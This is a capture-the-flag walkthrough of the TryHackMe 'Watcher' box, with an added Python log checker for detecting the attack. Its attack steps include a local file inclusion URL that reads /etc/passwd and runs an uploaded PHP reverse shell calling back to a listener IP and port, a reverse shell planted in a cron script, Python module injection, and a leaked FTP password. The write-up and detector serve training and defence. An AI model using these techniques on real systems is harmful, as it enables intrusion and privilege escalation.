Tryhackme – Watcher

Initial foothold

As usual I set the boxip variable and scan the target. Three ports are open: FTP, SSH and HTTP.

Flag 1

Checking robots.txt we get a filename, /flag_1.txt. Browsing to it, we get our first flag.

Flag 2

Browsing to the second file listed in /robots.txt, we get a forbidden access error.

Each post on the website, however, links to a PHP file through a post parameter, which could be an LFI. Pointing the post parameter at secret_file_do_not_read.txt, we get FTP credentials: ftpuser:givemefiles777
Also note that the FTP files are saved to /home/ftpuser/ftp/files/

By including the file ../../../../etc/passwd we get two potential users:

mat:x:1002:1002:,#,,:/home/mat:/bin/bash
toby:x:1003:1003:,,,:/home/toby:/bin/bash

Connecting with ftp $(boxip) using the aforementioned credentials, we get the second flag and see the files folder.

User

Flag 3 & 4

Uploading a PHP reverse shell over FTP and then including it through the same LFI, by browsing to http://10.10.179.149/post.php?post=../../../../home/ftpuser/ftp/files/cshell.php&ip=10.11.0.217&port=1234, we pop a www-data shell.
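Both the /etc/passwd read and the include of the uploaded cshell.php go through the same post parameter, so both leave a recognisable trace in the web server's access log. The checker below is an added example, not part of the original write-up: it decodes each request's query parameters and flags traversal segments, includes that resolve to sensitive paths, and the ip/port callback parameters; the log lines are constructed, not captured from the box.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample lines in Apache combined-log style; not taken from the original write-up.
SAMPLE_LOG = """\
10.11.0.217 - - [01/Jan/2024:10:00:01 +0000] "GET /post.php?post=post1.php HTTP/1.1" 200 1534 "-" "curl/7.8"
10.11.0.217 - - [01/Jan/2024:10:00:07 +0000] "GET /post.php?post=../../../../etc/passwd HTTP/1.1" 200 2201 "-" "curl/7.8"
10.11.0.217 - - [01/Jan/2024:10:00:09 +0000] "GET /post.php?post=..%252F..%252F..%252Fhome%252Fftpuser%252Fftp%252Ffiles%252Fcshell.php&ip=10.11.0.217&port=1234 HTTP/1.1" 200 10 "-" "curl/7.8"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+')
# ".." as a whole path segment, checked after decoding and normalising backslashes.
TRAVERSAL_RE = re.compile(r'(?:^|/)\.\.(?:/|$)')
# Paths a post include should never resolve to: system files and the FTP upload directory.
SENSITIVE_RE = re.compile(r'/etc/(?:passwd|shadow)|/home/[^/]+/ftp/', re.IGNORECASE)
CALLBACK_PARAMS = {'ip', 'port'}  # parameters that hand the included file a listener address


def decode_fully(value, rounds=3):
    """URL-decode repeatedly so %2e%2e and %252e%252e both collapse to '..'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.replace('\\', '/')


def inspect_line(line):
    """Return (client ip, parameter name, reasons) for a suspicious request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    params = parse_qs(urlsplit(m.group('target')).query, keep_blank_values=True)
    for name, values in params.items():
        for raw in values:
            value = decode_fully(raw)
            reasons = []
            if TRAVERSAL_RE.search(value):
                reasons.append('traversal')
            if SENSITIVE_RE.search(value):
                reasons.append('sensitive_path')
            if reasons and CALLBACK_PARAMS & set(params):
                reasons.append('callback_params')
            if reasons:
                return m.group('ip'), name, reasons
    return None


def scan_log(text):
    """Run inspect_line over every line and keep only the findings."""
    return [f for f in (inspect_line(l) for l in text.splitlines()) if f]
```

The second finding carries all three reasons, which is the combination worth alerting on: a traversal into the FTP upload directory together with a listener address in the same request.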

After checking sudo -l and getting a shell as user toby, I found flag 4 first, which meant I had missed a flag.

Running find / -name flag_3.txt, I found it in /var/www/html/more_secrets_a9f10a/flag_3.txt

Flag 5

Running LinPEAS is always a great idea; this time it revealed an interesting cron job.

I added a reverse shell command to the shell script the cron job runs, and a minute later the next shell popped.

And from that user I could grab flag 5.

Flag 6

Running sudo -l, we see we can run the script /home/mat/scripts/will_scripts.py as the user will.
Inspecting the code, we see it imports a custom module named cmd. We do a module injection: we write our own cmd module which runs bash, and get a shell as will.

Of course I grabbed the flag as well.

Root

Flag 7

Poking around, I eventually stumbled upon /etc/ssh, but it was a rabbit hole since I couldn't read any of the interesting files there. Eventually I noticed that will is a member of the adm group. When I searched for all files belonging to that group, something came up.

A base64-encoded file. Decoding it in CyberChef, I got the contents of an id_rsa private key.

After chmodding the key file to 600 and using it with ssh, I logged in as root.
Last flag snagged.